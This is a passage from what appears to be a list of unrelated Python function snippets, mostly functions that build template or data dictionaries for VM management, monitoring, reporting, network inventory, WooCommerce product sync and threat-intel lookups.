IPAddress(str(interface['ip_address'])).version == 6:\n host_name = interface['hostname']\n break\n if host_name is None:\n error = f'Host name is not found for the server # {vm_data[\"server_id\"]}'\n Windows.logger.error(error)\n vm_data['errors'].append(error)\n return None\n\n # Add the host information to the data\n data['host_name'] = host_name\n data['network_drive_url'] = settings.NETWORK_DRIVE_URL\n data['vms_path'] = settings.HYPERV_VMS_PATH\n\n return data", "def dict(self):\n d = {}\n d['template_id'] = self.id\n d['name'] = self.name\n d['cpu'] = self.cpu\n d['memory'] = self.memory\n d['points'] = self.points\n d['description'] = self.description\n d['ec2name'] = self.ec2name\n # state is not put in dictionary\n return d", "def _get_template_data(snapshot_data: Dict[str, Any], span: Span) -> Optional[Dict[str, Any]]:\n snapshot_id = snapshot_data['id']\n Linux.logger.debug(f'Compiling template data for Snapshot #{snapshot_id}')\n data: Dict[str, Any] = {key: None for key in Linux.template_keys}\n\n data['host_sudo_passwd'] = settings.NETWORK_PASSWORD\n data['snapshot_identifier'] = f'{snapshot_data[\"vm\"][\"id\"]}_{snapshot_data[\"id\"]}'\n data['vm_identifier'] = f'{snapshot_data[\"vm\"][\"project\"][\"id\"]}_{snapshot_data[\"vm\"][\"id\"]}'\n\n # Get the ip address of the host\n host_ip = None\n for interface in snapshot_data['server_data']['interfaces']:\n if interface['enabled'] is True and interface['ip_address'] is not None:\n if IPAddress(str(interface['ip_address'])).version == 6:\n host_ip = interface['ip_address']\n break\n if host_ip is None:\n error = f'Host ip address not found for the server # {snapshot_data[\"vm\"][\"server_id\"]}'\n Linux.logger.error(error)\n snapshot_data['errors'].append(error)\n return None\n data['host_ip'] = host_ip\n return data", "def _vm_templates(self, vm, log=None):\n vm_kwargs = self._vm_kwargs(vm)\n tids = self._get_templates(vm_kwargs, django_settings._MON_ZABBIX_TEMPLATES_VM, log=log)\n tids.update(self._get_vm_nic_templates(vm, vm_kwargs, django_settings._MON_ZABBIX_TEMPLATES_VM_NIC, log=log))\n tids.update(self._get_vm_disk_templates(vm, vm_kwargs, django_settings._MON_ZABBIX_TEMPLATES_VM_DISK, log=log))\n\n return tids", "def _get_template_data(self):\n self._set_meta_info()\n if self._report_key == ReportTypes.SEARCH_TOC_REPORT:\n self._set_selected()\n elif self._report_key == ReportTypes.MHR_COVER:\n self._report_data['cover'] = report_utils.set_cover(self._report_data)\n self._report_data['createDateTime'] = Report._to_report_datetime(self._report_data['createDateTime'])\n elif self._report_key == ReportTypes.MHR_REGISTRATION_COVER:\n self._report_data['regCover'] = report_utils.set_registration_cover(self._report_data)\n self._report_data['createDateTime'] = Report._to_report_datetime(self._report_data['createDateTime'])\n if str(self._report_data.get('registrationType', '')).startswith('TRAN'):\n self._report_data['documentDescription'] = \\\n TO_TRANSFER_DESC.get(self._report_data.get('registrationType'))\n elif self._report_data.get('registrationType', '') == MhrRegistrationTypes.REG_NOTE:\n self._report_data['documentDescription'] = self._report_data['note'].get('documentDescription', '')\n else:\n if self._report_key == ReportTypes.SEARCH_DETAIL_REPORT:\n self._set_search_additional_message()\n elif self._report_key == ReportTypes.MHR_TRANSFER:\n self._report_data['documentDescription'] = \\\n TO_TRANSFER_DESC.get(self._report_data.get('registrationType'))\n elif self._report_data.get('registrationType', '') == 
MhrRegistrationTypes.REG_NOTE:\n self._report_data['documentDescription'] = self._report_data['note'].get('documentDescription', '')\n self._set_date_times()\n self._set_addresses()\n self._set_owner_groups()\n if self._report_key not in (ReportTypes.MHR_REGISTRATION,\n ReportTypes.MHR_TRANSFER,\n ReportTypes.MHR_TRANSPORT_PERMIT):\n self._set_notes()\n if self._report_key == ReportTypes.SEARCH_DETAIL_REPORT:\n self._set_selected()\n self._set_ppr_search()\n elif self._report_key == ReportTypes.SEARCH_BODY_REPORT:\n # Add PPR search template setup here:\n self._set_ppr_search()\n if self._report_key not in (ReportTypes.MHR_TRANSFER, ReportTypes.MHR_EXEMPTION, ReportTypes.MHR_NOTE):\n self._set_location()\n if self._report_key != ReportTypes.MHR_TRANSPORT_PERMIT:\n self._set_description()\n return self._report_data", "def prepare_template(self, rest_handler, key=''):\n template_values = {}\n template_values['page_title'] = self.format_title('Edit Question')\n template_values['main_content'] = self.get_form(rest_handler, key=key)\n\n return template_values", "def build_dict(self, user_info):\n if user_info:\n lookup_dict = {\n \"cloud_stats\": {\"title\": \"Cloud Statistics\",\n \"link\": \"/status/cloud\",\n \"is_admin_panel\": True,\n \"template\": \"status/cloud.html\"},\n \"database_stats\": {\"title\": \"Database Information\",\n \"is_admin_panel\": True,\n \"template\": \"apps/database.html\"},\n \"memcache_stats\": {\"title\": \"Global Memcache Statistics\",\n \"is_admin_panel\": True,\n \"template\": \"apps/memcache.html\"},\n \"upload_app\": {\"title\": \"Upload Application\",\n \"link\": \"/apps/new\",\n \"template\": \"apps/new.html\"},\n \"delete_app\": {\"title\": \"Delete Application\",\n \"link\": \"/apps/delete\",\n \"template\": \"apps/delete.html\"},\n \"relocate_app\": {\"title\": \"Relocate Application\",\n \"link\": \"/apps/relocate\",\n \"template\": \"apps/relocate.html\"},\n \"service_accounts\": {\"title\": \"Service Accounts\",\n \"link\": \"/service_accounts\"},\n \"manage_users\": {\"title\": \"Manage Users\",\n \"link\": \"/authorize\",\n \"is_admin_panel\": True,\n \"template\": \"authorize/cloud.html\"},\n \"logging\": {\"title\": \"Log Viewer\",\n \"link\": \"/logs\",\n \"template\": \"logs/main.html\"},\n \"taskqueue\": {\"title\": \"TaskQueue\",\n \"link\": self.get_flower_url()},\n \"pull_queue_viewer\": {\"title\": \"Pull Queue Viewer\",\n \"link\": \"/pull_queue_viewer\"},\n \"cron\": {\"title\": \"Cron\",\n \"link\": \"/cron\",\n \"template\": \"cron/console.html\"},\n \"app_console\": {\"title\": \"Application Statistics\",\n \"template\": \"apps/console.html\",\n \"link\": \"/apps/\"},\n \"datastore_viewer\": {\"title\": \"Datastore Viewer\",\n \"link\": \"/datastore_viewer\"}\n }\n if user_info.can_upload_apps:\n lookup_dict[\"app_management\"] = {\"App Management\":\n [{\"upload_app\": lookup_dict[\n \"upload_app\"]},\n {\"delete_app\": lookup_dict[\n \"delete_app\"]},\n {\"relocate_app\": lookup_dict[\n \"relocate_app\"]},\n {\"service_accounts\": lookup_dict[\n \"service_accounts\"]}]}\n if user_info.is_user_cloud_admin:\n lookup_dict[\"appscale_management\"] = {\"AppScale Management\":\n [{\"cloud_stats\": lookup_dict[\n \"cloud_stats\"]},\n {\"manage_users\": lookup_dict[\n \"manage_users\"]}]}\n if user_info.owned_apps or user_info.is_user_cloud_admin:\n sections = ['taskqueue', 'pull_queue_viewer', 'logging',\n 'app_console', 'cron', 'datastore_viewer']\n lookup_dict[\"debugging_monitoring\"] = {\n \"Debugging/Monitoring\": [{section: 
lookup_dict[section]}\n for section in sections]\n }\n return lookup_dict\n else:\n return {}", "def create_initial_templates_document() -> Dict[str, Any]:\n return {\n 'schema-version': 'v1', 'document-version': '',\n 'gateway-templates': [], 'service-templates': [],\n }", "def _get_vm_ids_and_names_dict(self):\r\n vm_ids = {}\r\n vm_names = {}\r\n\r\n for content in self.content:\r\n if content['type'].lower() in ('vm', 'virtual machine'):\r\n vm_ids[content['id']] = content['display_name']\r\n vm_names[content['display_name']] = content['id']\r\n\r\n return vm_ids, vm_names", "def get_template_data(cls, pydata, view):\n return dict(previewdata=cls.get_previewdata(pydata),\n content_types=view.content_types,\n title=cls.html_title,\n brandingtitle=cls.html_brandingtitle,\n heading=cls.html_heading)", "def get_data(self, **kwargs):\n\n self.data = {}\n #node_data = ''\n #link_data = ''\n templates_data = self.request_from_server('templates')\n self.templates = templates_data\n project_data = self.request_from_server('projects')\n for project in project_data:\n project_name = project['name']\n if 'project_name' in kwargs:\n if project_name != kwargs['project_name']:\n continue\n\n self.data[project_name] = {}\n self.data[project_name]['project_id'] = project['project_id']\n self.data[project_name]['nodes'] = {}\n node_data = self.request_from_server('projects/{}/nodes'.format(project['project_id']))\n link_data = self.request_from_server('projects/{}/links'.format(project['project_id']))\n for node in node_data:\n node_name = node['name']\n self.data[project_name]['nodes'][node_name] = {}\n self.data[project_name]['nodes'][node_name]['node_id'] = node['node_id']\n self.data[project_name]['nodes'][node_name]['template_id'] = node['template_id']\n self.data[project_name]['nodes'][node_name]['node_type'] = node['node_type']\n self.data[project_name]['nodes'][node_name]['console_port'] = node['console']\n self.data[project_name]['nodes'][node_name]['console_session'] = None\n self.data[project_name]['nodes'][node_name]['x'] = node['x']\n self.data[project_name]['nodes'][node_name]['y'] = node['y']\n self.data[project_name]['nodes'][node_name]['ports'] = {}\n if project['status'] != 'closed':\n self.data[project_name]['nodes'][node_name]['status'] = node['status']\n for port in node['ports']:\n port_name = port['short_name']\n self.data[project_name]['nodes'][node_name]['ports'][port_name] = {}\n self.data[project_name]['nodes'][node_name]['ports'][port_name]['adapter_number'] = port['adapter_number']\n self.data[project_name]['nodes'][node_name]['ports'][port_name]['port_number'] = port['port_number']\n self.data[project_name]['nodes'][node_name]['ports'][port_name]['link_type'] = port['link_type']\n self.data[project_name]['nodes'][node_name]['ports'][port_name]['link_id'] = None\n self.data[project_name]['nodes'][node_name]['ports'][port_name]['in_use'] = False\n self.data[project_name]['nodes'][node_name]['ports'][port_name]['connected_to'] = None\n for link in link_data:\n for link_node in link['nodes']:\n if node['node_id'] == link_node['node_id']:\n if link_node['label']['text'] == port_name:\n self.data[project_name]['nodes'][node_name]['ports'][port_name]['link_id'] = link['link_id']\n self.data[project_name]['nodes'][node_name]['ports'][port_name]['in_use'] = True\n if link['nodes'].index(link_node) == 0:\n self.data[project_name]['nodes'][node_name]['ports'][port_name]['connected_to_id'] = link['nodes'][1]['node_id']\n 
self.data[project_name]['nodes'][node_name]['ports'][port_name]['connected_to'] = self.get_node_name_from_id(project_name,link['nodes'][1]['node_id'])\n else:\n self.data[project_name]['nodes'][node_name]['ports'][port_name]['connected_to_id'] = link['nodes'][0]['node_id']\n self.data[project_name]['nodes'][node_name]['ports'][port_name]['connected_to'] = self.get_node_name_from_id(project_name,link['nodes'][0]['node_id'])", "def fill_default_attributes(self, template_dictionary, escape_db_operations=False):\n template_dictionary = self._populate_user_and_project(template_dictionary, escape_db_operations)\n template_dictionary = self._populate_message(template_dictionary)\n template_dictionary = self._populate_menu(template_dictionary)\n\n if KEY_ERRORS not in template_dictionary:\n template_dictionary[KEY_ERRORS] = {}\n if KEY_FORM_DATA not in template_dictionary:\n template_dictionary[KEY_FORM_DATA] = {}\n if KEY_SUB_SECTION not in template_dictionary and KEY_SECTION in template_dictionary:\n template_dictionary[KEY_SUB_SECTION] = template_dictionary[KEY_SECTION]\n if KEY_SUBMENU_LIST not in template_dictionary:\n template_dictionary[KEY_SUBMENU_LIST] = None\n\n template_dictionary[KEY_CURRENT_VERSION] = cfg.BASE_VERSION\n return template_dictionary", "def __verify_details(self):\n if self.major[0] not in self.data[self.root]:\n self.data[self.root][self.major[0]] = {}\n for key, value in self.template_data[self.root][self.major[0]].items():\n key, value = self.__verified_details_key_value(key, value)\n self.data[self.root][self.major[0]][key] = self.__verify_values(key, value, self.data[self.root][self.major[0]])", "def get_template_data(self) -> dict:\n template_data = self._get_template_data()\n\n @dataclass\n class FileEntry:\n \"\"\"Provides an entry into manifest object.\"\"\"\n\n name: str\n size: str\n md5: Optional[str]\n\n template_data[\"resource_files\"] = [\n FileEntry(entry.name, convert_size(entry.size), entry.md5)\n for entry in self.resource.get_manifest().entries.values()\n if not entry.name.startswith(\"statistics\")\n and entry.name != \"index.html\"]\n template_data[\"resource_files\"].append(\n FileEntry(\"statistics/\", \"\", \"\"))\n return template_data", "def get_template_variables(hostname: str) -> dict:\n looprun = asyncio.get_event_loop().run_until_complete\n\n nb = NetboxClient(timeout=60)\n nb_dev = looprun(nb.fetch_device(hostname))\n\n # setup API params to retrieve only those items specific to this device.\n # the APIs used share the same parameters :-)\n\n params = dict(device_id=nb_dev[\"id\"], limit=0)\n\n res_intfs, res_ipaddrs, res_site = looprun(\n asyncio.gather(\n nb.get(\"/dcim/interfaces\", params=params),\n nb.get(\"/ipam/ip-addresses\", params=params),\n nb.get(f\"/dcim/sites/{nb_dev['site']['id']}\"),\n )\n )\n\n rp_ipaddr = None\n\n if hostname.endswith(\"rs21\"):\n # need to fetch rs22 loopback0 IP address\n res: Response = looprun(\n nb.get(\n \"/ipam/ip-addresses\",\n params={\"interface\": \"loopback0\", \"device\": hostname[0:3] + \"rs22\"},\n )\n )\n\n res.raise_for_status()\n body = res.json()\n if body[\"count\"] != 1:\n raise RuntimeError(\"RS22 loopback0 IP not found\")\n\n rp_ipaddr = body[\"results\"][0][\"address\"]\n\n looprun(nb.aclose())\n\n intf_recs = res_intfs.json()[\"results\"]\n ipaddr_recs = res_ipaddrs.json()[\"results\"]\n site_rec = res_site.json()\n\n tvars = dict(\n hostname=nb_dev[\"name\"],\n site=nb_dev[\"site\"][\"slug\"],\n ASN=site_rec[\"asn\"],\n INTF_DESC={rec[\"name\"]: rec[\"description\"] for rec in 
intf_recs},\n INTF_IPADDR={rec[\"interface\"][\"name\"]: rec[\"address\"] for rec in ipaddr_recs},\n )\n\n if not rp_ipaddr:\n rp_ipaddr = tvars[\"INTF_IPADDR\"][\"loopback0\"]\n\n tvars[\"pim_rp_address\"] = rp_ipaddr.split(\"/\")[0]\n\n if (rcd := nb_dev[\"config_context\"]) is not None:\n tvars.update(rcd)\n\n if (lcd := nb_dev[\"local_context_data\"]) is not None:\n tvars.update(lcd)\n\n return tvars", "def make_entity_dict(class_reference, template, partial_dict): \n _data = class_reference.properties()\n for _key in _data:\n _data[_key] = partial_dict.get(_key, template.get(_key, '')) \n return _data", "def process_template(template, data):\n t = Template(template, data)\n t.job = get_current_job()\n t.process()\n\n result = dict(template=template, data=data, result_folder=t.resultdir, log=t.log)\n\n return result", "def prepare_product_variant_dict(self, instance, template, data, basic_detail, update_price,\n update_image, common_log_id, model_id):\n common_log_line_obj = self.env['common.log.lines.ept']\n wcapi = instance.woo_connect()\n variants_to_create = []\n flag = True\n for variant in template.woo_product_ids:\n # var_url = ''\n price = 0.0\n if variant.variant_id:\n info = {'id':variant.variant_id}\n\n if basic_detail:\n weight = self.convert_weight_by_uom(variant.product_id.weight, instance)\n info.update({'sku':variant.default_code, 'weight':str(weight),\n \"manage_stock\":variant.woo_is_manage_stock})\n else:\n attributes = \\\n self.get_product_attribute(template.product_tmpl_id, instance, common_log_id,\n model_id)[0]\n info = self.get_variant_data(variant, instance, False)\n\n if update_image:\n info.update(self.get_variant_image(instance, variant))\n\n if update_price:\n price = instance.woo_pricelist_id.get_product_price(variant.product_id, 1.0,\n partner=False,\n uom_id=variant.product_id.uom_id.id)\n info.update({'regular_price':str(price), 'sale_price':str(price)})\n\n if template.woo_tmpl_id != variant.variant_id:\n if variant.variant_id:\n data.get('variations').append(info)\n else:\n variants_to_create.append(info)\n flag = True\n elif template.woo_tmpl_id == variant.variant_id:\n del data['variations']\n if basic_detail:\n data.update({'sku':variant.default_code,\n \"manage_stock\":variant.woo_is_manage_stock})\n if update_price:\n data.update({'regular_price':str(price), 'sale_price':str(price)})\n flag = True\n\n if data.get('variations'):\n variant_batches = self.prepare_batches(data.get('variations'))\n for woo_variants in variant_batches:\n _logger.info('variations batch processing')\n res = wcapi.post('products/%s/variations/batch' % (data.get('id')),\n {'update':woo_variants})\n _logger.info('variations batch process completed [status: %s]', res.status_code)\n if res.status_code in [200, 201]:\n del data['variations']\n if res.status_code not in [200, 201]:\n message = \"Update Product Variations\\n%s\" % (res.content)\n common_log_line_obj.woo_product_export_log_line(message, model_id,\n common_log_id,\n False)\n if variants_to_create:\n \"\"\"Needed to update the attributes of template for adding new variant, while update\n process.\"\"\"\n _logger.info(\"Updating attributes of %s in Woo..\" % (template.name))\n if data.get(\"variations\"):\n del data['variations']\n data.update({\"attributes\":attributes})\n res = wcapi.put(\"products/%s\" % (data.get(\"id\")), data)\n\n _logger.info(\"Creating variants in Woo..\")\n res = wcapi.post('products/%s/variations/batch' % (data.get('id')),\n {'create':variants_to_create})\n try:\n response = res.json()\n 
except Exception as e:\n message = \"Json Error : While update products to WooCommerce for instance %s.\" \\\n \" \\n%s\" % (instance.name, e)\n common_log_line_obj.woo_product_export_log_line(message, model_id,\n common_log_id,\n False)\n return data, flag\n for product in response.get(\"create\"):\n if product.get(\"error\"):\n message = \"Update Product \\n%s\" % (product.get(\"error\").get('message'))\n common_log_line_obj.woo_product_export_log_line(message, model_id,\n common_log_id,\n False)\n else:\n variant_id = product.get(\"id\")\n sku = product.get(\"sku\")\n variant = template.woo_product_ids.filtered(lambda x:x.default_code == sku)\n if variant:\n variant.write({\"variant_id\":variant_id, \"exported_in_woo\":True})\n\n self.sync_woo_attribute_term(instance, common_log_id)\n\n return data, flag", "def get_data_to_create_object(self):\n return {}", "def get_json(self):\n data = {}\n data['ip'] = self.ip\n\n try:\n data['country'] = self.processedvtdata[\"country\"]\n except KeyError:\n data['country'] = 'None'\n try:\n data['as'] = self.processedvtdata[\"as_owner\"]\n except KeyError:\n data['as'] = 'None'\n try:\n data['rdns'] = self.processedvtdata[\"self.reversedns\"]\n except KeyError:\n data['rdns'] = 'None'\n try:\n data['label'] = self.expertlabel\n except AttributeError:\n data['label'] = ''\n\n # geodata\n #{\"status\":\"success\",\"country\":\"Yemen\",\"countryCode\":\"YE\",\"region\":\"SA\",\"regionName\":\"Amanat Alasimah\",\"city\":\"Sanaa\",\"zip\":\"\",\"lat\":15.3522,\"lon\":44.2095,\"timezone\":\"Asia/Aden\",\"isp\":\"Public Telecommunication Corporation\",\"org\":\"YemenNet\",\"as\":\"AS30873 Public Telecommunication Corporation\",\"query\":\"134.35.218.63\"}\n if self.geodata:\n data['geodata'] = self.geodata\n \n # vt resolutions. Is a list\n data['vt'] = {}\n try:\n if self.processedvtdata['resolutions'] != 'None':\n data['vt']['resolutions'] = []\n for count, resolution_tuple in enumerate(self.processedvtdata['resolutions']):\n if count >= self.amount_to_print:\n break\n temp = {}\n temp['date'] = resolution_tuple[0]\n temp['domain'] = resolution_tuple[1]\n data['vt']['resolutions'].append(temp)\n except KeyError:\n pass\n\n # vt urls. Is a list\n try:\n if self.processedvtdata['detected_urls'] != 'None':\n data['vt']['detected_urls'] = []\n for count, url_tuple in enumerate(self.processedvtdata['detected_urls']):\n if count >= self.amount_to_print:\n break\n temp = {}\n temp['date'] = url_tuple[0]\n temp['url'] = url_tuple[1][0]\n temp['detections'] = str(url_tuple[1][1]) + '/' + str(url_tuple[1][2])\n data['vt']['detected_urls'].append(temp)\n except KeyError:\n pass\n\n\n # vt detected communicating samples. Is a list\n try:\n if self.processedvtdata['detected_communicating_samples'] != 'None':\n data['vt']['detected_communicating_samples'] = []\n for count, communcating_tuple in enumerate(self.processedvtdata['detected_communicating_samples']):\n if count >= self.amount_to_print:\n break\n temp = {}\n temp['date'] = communcating_tuple[0]\n temp['detections'] = str(communcating_tuple[1][0]) + '/' + str(communcating_tuple[1][1])\n temp['sha256'] = communcating_tuple[1][2]\n data['vt']['detected_communicating_samples'].append(temp)\n except AttributeError:\n pass\n\n # vt detected downloaded samples. 
Is a list\n try:\n if self.processedvtdata['detected_downloaded_samples'] != 'None':\n data['vt']['detected_downloaded_samples'] = []\n for count, detected_tuple in enumerate(self.processedvtdata['detected_downloaded_samples']):\n if count >= self.amount_to_print:\n break\n temp = {}\n temp['date'] = detected_tuple[0]\n temp['detections'] = str(detected_tuple[1][0]) + '/' + str(detected_tuple[1][1])\n temp['sha256'] = detected_tuple[1][2]\n data['vt']['detected_downloaded_samples'].append(temp)\n except AttributeError:\n pass\n\n # vt referrer downloaded samples. Is a list\n try:\n if self.processedvtdata['detected_referrer_samples'] != 'None':\n data['vt']['detected_referrer_samples'] = []\n for count, referrer_tuple in enumerate(self.processedvtdata['detected_referrer_samples']):\n if count >= self.amount_to_print:\n break\n temp = {}\n temp['sha256'] = referrer_tuple[0]\n temp['detections'] = str(referrer_tuple[1][0]) + '/' + str(referrer_tuple[1][1])\n data['vt']['detected_referrer_samples'].append(temp)\n except AttributeError:\n pass\n\n # pt data\n data['pt'] = {}\n if self.processedptdata:\n count = 0\n data['pt']['passive_dns'] = []\n for result in self.processedptdata_results:\n if count >= self.amount_to_print:\n break\n temp = {}\n temp['lastseen'] = result[0]\n temp['firstseen'] = result[1][0]\n temp['hostname'] = result[1][1]\n data['pt']['passive_dns'].append(temp)\n count += 1\n\n # shodan data\n try:\n if self.shodandata:\n data['shodan'] = self.shodandata\n except AttributeError:\n pass\n\n data = json.dumps(data)\n return data", "def _setup_report_data(self):\n # current_app.logger.debug('Setup report data template starting.')\n template = self._get_template()\n current_app.logger.debug('Setup report data template completed, setup data starting.')\n data = {\n 'reportName': self._get_report_filename(),\n 'template': template,\n 'templateVars': self._get_template_data()\n }\n current_app.logger.debug('Setup report data completed.')\n return data", "def normalize_data(vms, vm_statuses, nics, public_ips):\n normalized_data = {}\n for vm_id in vms:\n vm_data = vms[vm_id]\n name = vm_data['name']\n nic_id = vm_data['nic_id']\n nic_data = nics[nic_id]\n public_ip_id = nic_data['public_ip_id']\n public_ip_data = public_ips[public_ip_id]\n public_ip = public_ip_data['address']\n public_dns_name = public_ip_data['fqdn']\n status = vm_statuses[vm_id]\n source = \"Azure\"\n instance_data = { 'public_ip': public_ip, 'public_dns_name': public_dns_name, 'status': status, 'source': source }\n normalized_data[name] = instance_data\n return normalized_data", "def get_model_template(self, ApiId: str, ModelId: str) -> Dict:\n pass", "def create_system_data():\n system_data = dict()\n system_data['system'] = dict()\n system_data['system']['primary'] = dict()\n system_data['system']['primary']['controllers'] = dict()\n system_data['system']['primary']['controllers']['re0'] = dict()\n system_data['system']['primary']['controllers']['re0']['hostname'] = 'abc'\n system_data['system']['primary']['controllers']['re0']['mgt-ip'] = '1.1.1.1'\n system_data['system']['primary']['controllers']['re0']['osname'] = 'Paragon'\n system_data['system']['primary']['name'] = 'abc'\n system_data['system']['primary']['model'] = 'Paragon'\n system_data['system']['primary']['make'] = 'Calnex'\n system_data['system']['primary']['server-ip'] = '1.1.1.2'\n system_data['system']['primary']['osname'] = 'Paragon'\n return system_data", "def get_crud_template_dict():\n return CRUD_TEMPLATE_DICT", "def 
gen_compute_data(self):\n\n print \"\\t* Generating combined nova and neutron data\"\n self.init_compute_clients()\n self.compute_data[\"heat_template_version\"] = \"2013-05-23\"\n self.compute_data[\"description\"] = \"Generated Template %s on Project %s\" % \\\n (str(datetime.datetime.now().strftime(\"%A, %d. %B %Y %I:%M%p\")), str(self.tenant_name))\n self.compute_data[\"parameters\"] = {}\n self.compute_data[\"resources\"] = {}\n self.gen_parameters()\n self.gen_resources()\n self.compute_template = self.compute_data", "def prepare_product_variant_dict(self, instance, template, data, basic_detail, update_price,\n update_image, common_log_id, model_id):\n common_log_line_obj = self.env['common.log.lines.ept']\n wc_api = instance.woo_connect()\n variants_to_create = []\n flag = True\n for variant in template.woo_product_ids:\n price = 0.0\n if variant.variant_id:\n info = {'id': variant.variant_id, 'menu_order': variant.sequence}\n # Below are used to set the color in the metadata field.\n product_template_attribute_value = variant.product_id.product_template_attribute_value_ids.filtered(\n lambda attribute: attribute.display_type == 'color') or False\n if product_template_attribute_value and product_template_attribute_value.product_attribute_value_id.html_color:\n meta_data = []\n meta_data.append({'key': 'markersnpens-color-picker',\n 'value': product_template_attribute_value.product_attribute_value_id.html_color})\n info.update({'meta_data': meta_data})\n\n if basic_detail:\n weight = self.convert_weight_by_uom(variant.product_id.weight, instance)\n info.update({'sku': variant.default_code, 'weight': str(weight),\n \"manage_stock\": variant.woo_is_manage_stock})\n else:\n attributes = self.get_product_attribute(template.product_tmpl_id, instance, common_log_id, model_id)[0]\n info = self.get_variant_data(variant, instance, False)\n\n if update_image:\n info.update(self.get_variant_image(instance, variant))\n\n if update_price:\n price = instance.woo_pricelist_id.get_product_price(variant.product_id, 1.0, partner=False,\n uom_id=variant.product_id.uom_id.id)\n info.update({'regular_price': str(price), 'sale_price': str(price)})\n\n if template.woo_tmpl_id != variant.variant_id:\n if variant.variant_id:\n data.get('variations').append(info)\n else:\n variants_to_create.append(info)\n flag = True\n elif template.woo_tmpl_id == variant.variant_id:\n del data['variations']\n if basic_detail:\n data.update({'sku': variant.default_code, \"manage_stock\": variant.woo_is_manage_stock})\n if update_price:\n data.update({'regular_price': str(price), 'sale_price': str(price)})\n flag = True\n\n if data.get('variations'):\n variant_batches = self.prepare_batches(data.get('variations'))\n for woo_variants in variant_batches:\n _logger.info('variations batch processing')\n res = wc_api.post('products/%s/variations/batch' % (data.get('id')), {'update': woo_variants})\n _logger.info('variations batch process completed [status: %s]', res.status_code)\n if res.status_code in [200, 201]:\n del data['variations']\n if res.status_code not in [200, 201]:\n message = \"Update Product Variations\\n%s\" % res.content\n common_log_line_obj.woo_product_export_log_line(message, model_id, common_log_id, False)\n if variants_to_create:\n \"\"\"Needed to update the attributes of template for adding new variant, while update\n process.\"\"\"\n _logger.info(\"Updating attributes of %s in Woo..\" % template.name)\n if data.get(\"variations\"):\n del data['variations']\n data.update({\"attributes\": attributes})\n res = 
wc_api.put(\"products/%s\" % (data.get(\"id\")), data)\n\n _logger.info(\"Creating variants in Woo..\")\n res = wc_api.post('products/%s/variations/batch' % (data.get('id')), {'create': variants_to_create})\n try:\n response = res.json()\n except Exception as error:\n message = \"Json Error : While update products to WooCommerce for instance %s. \\n%s\" % (\n instance.name, error)\n common_log_line_obj.woo_product_export_log_line(message, model_id, common_log_id, False)\n return data, flag\n for product in response.get(\"create\"):\n if product.get(\"error\"):\n message = \"Update Product \\n%s\" % (product.get(\"error\").get('message'))\n common_log_line_obj.woo_product_export_log_line(message, model_id, common_log_id, False)\n else:\n variant_id = product.get(\"id\")\n variant = template.woo_product_ids.filtered(lambda x: x.default_code == product.get(\"sku\"))\n if variant:\n variant.write({\"variant_id\": variant_id, \"exported_in_woo\": True})\n\n self.sync_woo_attribute_term(instance, common_log_id)\n\n return data, flag", "def _template_data(self):\n return {\"form\": self.form.render()}", "def get_low_use_template_data(self, creator, low_use_instances, instances_scheduled_for_deletion):\n template_data = {\n 'creator': creator,\n 'creator_name': creator.split('@')[0],\n 'instance': []\n }\n\n for instance in low_use_instances:\n if instance['Creator'] is None:\n instance['Creator'] = 'Unknown'\n instance_data = {\n 'instance_id': instance['InstanceID'],\n 'instance_creator': instance['Creator'],\n 'scheduled_for_deletion': False,\n 'cost': instance['Cost'],\n 'average_cpu_usage': instance['AverageCpuUsage'],\n 'average_network_usage': instance['AverageNetworkUsage']\n }\n template_data['instance'].append(instance_data)\n\n for instance in instances_scheduled_for_deletion:\n if instance['Creator'] is None:\n instance['Creator'] = 'Unknown'\n instance_data = {\n 'instance_id': instance['InstanceID'],\n 'instance_creator': instance['Creator'],\n 'scheduled_for_deletion': True,\n 'cost': instance['Cost'],\n 'average_cpu_usage': instance['AverageCpuUsage'],\n 'average_network_usage': instance['AverageNetworkUsage']\n }\n template_data['instance'].append(instance_data)\n\n return template_data", "def generate(self) -> dict:\n user_data = {\n \"merge_proposals\": self._render_merge_proposals(),\n \"bug_reports\": self._render_reported(),\n \"code_reviews\": {},\n }\n for project in self.projects:\n user_data[\"code_reviews\"][\n project.name\n ] = project.render_project_votes_by_user(self.user)\n\n return user_data", "def pre_service_template_create(self, resource_dict):\n pass", "def get_data_to_update_object(self):\n return {}", "def map_to_app_environment_infos(self, app):\n app['environment_infos'] = {}\n app['environment_infos']['security_groups'] = []\n for form_security_group in self.environment_infos.form.security_groups:\n if form_security_group.data:\n security_group = form_security_group.data\n app['environment_infos']['security_groups'].append(security_group)\n\n app['environment_infos']['subnet_ids'] = []\n for form_subnet_id in self.environment_infos.form.subnet_ids:\n if form_subnet_id.data:\n subnet_id = form_subnet_id.data\n app['environment_infos']['subnet_ids'].append(subnet_id)\n\n app['environment_infos']['instance_profile'] = self.environment_infos.form.instance_profile.data\n app['environment_infos']['key_name'] = self.environment_infos.form.key_name.data\n app['environment_infos']['public_ip_address'] = self.environment_infos.form.public_ip_address.data\n\n 
app['environment_infos']['root_block_device'] = {}\n if self.environment_infos.form.root_block_device_size.data:\n app['environment_infos']['root_block_device'][\n 'size'] = self.environment_infos.form.root_block_device_size.data\n else:\n # default value to prevent low disk space alerts\n block_min_size = ghost_app_schema['environment_infos']['schema']['root_block_device']['schema']['size']['min']\n app['environment_infos']['root_block_device']['size'] = block_min_size\n\n root_block_name = self.environment_infos.form.root_block_device_name.data\n app['environment_infos']['root_block_device']['name'] = root_block_name or ''\n\n app['environment_infos']['optional_volumes'] = []\n for form_opt_vol in self.environment_infos.form.optional_volumes:\n opt_vol = {}\n if form_opt_vol.device_name.data:\n opt_vol['device_name'] = form_opt_vol.device_name.data\n if form_opt_vol.volume_type.data:\n opt_vol['volume_type'] = form_opt_vol.volume_type.data\n if form_opt_vol.volume_size.data:\n opt_vol['volume_size'] = form_opt_vol.volume_size.data\n if form_opt_vol.iops.data:\n opt_vol['iops'] = form_opt_vol.iops.data\n if form_opt_vol.launch_block_device_mappings.data:\n opt_vol['launch_block_device_mappings'] = form_opt_vol.launch_block_device_mappings.data\n app['environment_infos']['optional_volumes'].append(opt_vol)\n\n app['environment_infos']['instance_tags'] = []\n for form_tag in self.environment_infos.form.instance_tags:\n tag = {}\n if form_tag.tag_name.data:\n tag['tag_name'] = form_tag.tag_name.data\n tag['tag_value'] = form_tag.tag_value.data\n app['environment_infos']['instance_tags'].append(tag)", "def post(request):\n # load request json\n try:\n request_content = json.loads(request.body)\n except JSONDecodeError as e:\n return failed(status=1000001)\n\n # validate request data\n schema = SCHEMA.copy()\n schema['required'] = ['name', 'image_path']\n validate_result, msg = utils.validate_json(data=request_content, schema=schema)\n if validate_result != 0:\n return failed(status=1000001, 